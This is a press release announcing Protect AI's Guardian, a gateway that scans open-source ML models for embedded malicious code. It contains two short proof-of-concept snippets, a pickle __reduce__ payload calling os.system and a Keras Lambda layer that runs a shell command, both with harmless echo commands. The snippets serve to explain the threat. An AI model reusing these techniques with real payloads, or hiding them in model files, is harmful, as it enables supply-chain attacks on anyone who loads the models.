Protect AI Announces Guardian, A Secure Gateway To Enforce ML Model Security

Industry-leading AI security platform now scans and blocks risks in widely deployed open-source models from Hugging Face and other public ML model repositories

SEATTLE--Protect AI, the artificial intelligence (AI) and machine learning (ML) security company, today announced Guardian, an industry-first secure gateway that enables organizations to enforce security policies on ML models to prevent malicious code from entering their environments. Guardian is based on ModelScan, an open-source tool from Protect AI that scans machine learning models to determine whether they contain unsafe code. Guardian brings together the best of Protect AI’s open-source offerings, enables enterprise-level enforcement and management of model security, and extends coverage with proprietary scanning capabilities.

The growing democratization of AI/ML is largely driven by the accessibility of open-source foundational models on platforms like Hugging Face. These models, downloaded millions of times monthly, power a wide range of AI applications. However, this trend also introduces security risks: the open exchange of files on these repositories can lead to the unintended spread of malicious software among users.

“ML models are new types of assets in an organization's infrastructure, yet they are not scanned for viruses and malicious code with the same rigor as even a PDF file before they are used,” said Ian Swanson, CEO of Protect AI. “There are thousands of models downloaded millions of times from Hugging Face on a monthly basis, and these models can contain dangerous code. Guardian enables customers to take back control over open-source model security.”

The security posture of openly shared machine learning models puts an enterprise at critical risk of a Model Serialization attack. This occurs when malicious code is added to the contents of a model during serialization (saving) and before distribution, creating a modern version of the Trojan Horse. Once embedded in a model, this unseen code can be executed to steal data and credentials, poison data, and much more. These risks are prevalent in models hosted in large repositories such as Hugging Face.
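To make the mechanics concrete, here is a minimal sketch of a serialization attack using Python’s pickle format, the default save format for many ML frameworks. The class, payload, and file name are illustrative, and the command is deliberately harmless; an attacker could substitute any shell command.

    import os
    import pickle

    class MaliciousPayload:
        # __reduce__ tells pickle how to rebuild this object on load; returning
        # (os.system, (cmd,)) makes deserialization execute the command.
        def __reduce__(self):
            return (os.system, ("echo 'arbitrary code ran at model load time'",))

    # "Save" the payload as if it were model weights.
    with open("model.pkl", "wb") as f:
        pickle.dump(MaliciousPayload(), f)

    # Anyone who loads the file runs the embedded command.
    with open("model.pkl", "rb") as f:
        pickle.load(f)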

Last year, Protect AI launched ModelScan, an open-source tool that scans AI/ML models for potential attacks to help secure systems against supply chain attacks. Since then, Protect AI has used ModelScan to evaluate over 400,000 models hosted on Hugging Face to identify unsafe models, and refreshes this knowledge base nightly. To date, over 3,300 models have been found to have the ability to execute rogue code. These models continue to be downloaded and deployed into ML environments without the security tooling needed to scan them for risks prior to adoption.
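As a hedged usage sketch, scanning a local artifact such as the model.pkl file from the example above looks like the following. ModelScan is installable via pip install modelscan, and its -p flag takes a path to a model file or directory; the path here is illustrative.

    import subprocess

    # Invoke the ModelScan CLI on a local model artifact.
    result = subprocess.run(
        ["modelscan", "-p", "model.pkl"],
        capture_output=True,
        text=True,
    )
    # The report flags unsafe operators (e.g. os.system) without executing them.
    print(result.stdout)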

Unlike other open-source alternatives, Protect AI’s Guardian acts as a secure gateway, bridging ML development and deployment processes that use Hugging Face and other model repositories. It uses proprietary vulnerability scanners, including a specialized scanner for Keras lambda layers, to proactively scan open-source models for malicious code, ensuring that only secure, policy-compliant models enter organizational networks. With advanced access control features and dashboards, Guardian gives security teams control over model entry and comprehensive insight into model origins, creators, and licensing. Guardian also integrates seamlessly with existing security frameworks and complements Protect AI’s Radar for extensive AI/ML threat surface visibility in organizations.
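For context on why Keras lambda layers warrant a dedicated scanner, here is a minimal sketch of the risk, written against Keras 2 (TensorFlow 2.15 or earlier); the function, payload, and file name are illustrative. A Lambda layer serializes its Python function’s bytecode into the saved model, so whoever loads and runs the model also runs that code.

    import tensorflow as tf

    def payload(x):
        import os  # imported inside the function so it resolves after deserialization
        os.system("echo 'code smuggled inside a model layer'")  # harmless stand-in
        return x

    model = tf.keras.Sequential([
        tf.keras.layers.Lambda(payload, input_shape=(1,)),
    ])
    model.save("lambda_model.h5")  # legacy HDF5 format marshals the function bytecode

    # A downstream consumer re-hydrates the lambda on load...
    loaded = tf.keras.models.load_model("lambda_model.h5")
    # ...and running the model executes the embedded payload.
    loaded.predict(tf.constant([[1.0]]))
    # Note: Keras 3 refuses to deserialize marshaled lambdas unless the caller
    # passes safe_mode=False, precisely because of this attack vector.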

Guardian strengthens Protect AI’s leading position in AI security and MLSecOps, adding essential capabilities to its comprehensive platform. Recognized for its deep expertise in AI and ML model security, Protect AI enables enterprises to develop, deploy, and manage secure, compliant, and operationally efficient AI applications by providing the ability to see, know, and manage security risks across enterprise AI environments. Protect AI is committed to leading the charge toward a safer AI-powered world and pioneering the adoption of MLSecOps practices. Contact Protect AI to learn more about Guardian and other Protect AI offerings.

About Protect AI

Protect AI offers the broadest and most comprehensive platform to secure your AI. It enables you to see, know, and manage security risks to defend against unique AI security threats, and to embrace MLSecOps for a safer AI-powered world. Protect AI’s platform provides visibility into the AI/ML attack surface, detects unique security threats, and remediates vulnerabilities. Founded by AI leaders from Amazon and Oracle, Protect AI is funded by Acrew Capital, boldstart ventures, Evolution Equity Partners, Knollwood Capital, Pelion Ventures and Salesforce Ventures. The company is headquartered in Seattle, Washington.

For more information visit us on the web, and follow us on LinkedIn and X/Twitter.

Contacts

Media:
Marc Gendron
Marc Gendron PR for Protect AI
marc@mgpr.net
617-877-7480

Release Summary

ML models are new types of assets, yet they are not scanned for viruses and malicious code with the same rigor as even a PDF file before they are used
